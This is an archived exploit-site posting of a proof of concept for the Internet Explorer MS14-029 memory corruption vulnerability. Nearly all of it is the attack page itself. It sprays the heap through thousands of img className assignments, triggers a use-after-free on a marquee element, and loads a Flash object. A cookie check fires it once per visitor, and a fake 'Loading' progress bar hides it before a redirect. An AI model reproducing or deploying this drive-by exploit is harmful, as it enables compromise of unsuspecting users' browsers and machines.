Internet Explorer MS14-029 Memory Corruption PoC
|
来源:vfocus.net 作者:PhysicalDrive0 发布时间:2014-08-29
|
|
<html> <head> <meta http-equiv="Cache-Control" content="no-cache"/> <script > function stc() { var Then = new Date(); Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); } function cid() { var swf = 0; try { swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { } if (!swf) return 0; var cookieString = new String(document.cookie); if(cookieString.indexOf("d93kaj3Nja3") == -1) {stc(); return 1;}else{ return 0;} } String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);} var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1); var ll=new Array(); for (i=0;i<3333;i++)ll.push(document.createElement("img")); for(i=0;i<3333;i++) ll[i].className=tpx; for(i=0;i<3333;i++) ll[i].className=""; CollectGarbage(); function b2() { try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){} try{xdd.outerText='';}catch(exception){} CollectGarbage(); for(i=0;i<3333;i++) ll[i].className=tpx; } function a1(){ if (!cid()) return; document.body.contentEditable="true"; try{xdd.applyElement(document.createElement("frameset"));}catch(exception){} try{document.selection.createRange().select();}catch(exception){} } </ script > </head> <body onload='setTimeout("a1();",2000);' onresize=b2()> <marquee id=xdd > </marquee> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> <param name="movie" value="storm.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="true" /> </object> </body> <body> <form name=loading> ¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font> ¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> ¡¡¡¡ ¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> ¡¡¡¡<script > ¡¡ var bar=0¡¡ var line="||"¡¡ var amount="||"¡¡ count()¡¡ function count(){¡¡ bar=bar+2¡¡ amount =amount + line¡¡ document.loading.chart.value=amount¡¡ document.loading.percent.value=bar+"%"¡¡ if (bar<99)¡¡ {setTimeout("count()",500);}¡¡ else¡¡ {window.location = "http://www.google.com.hk";}¡¡ }</ script > ¡¡</p> </form> <p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p> </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|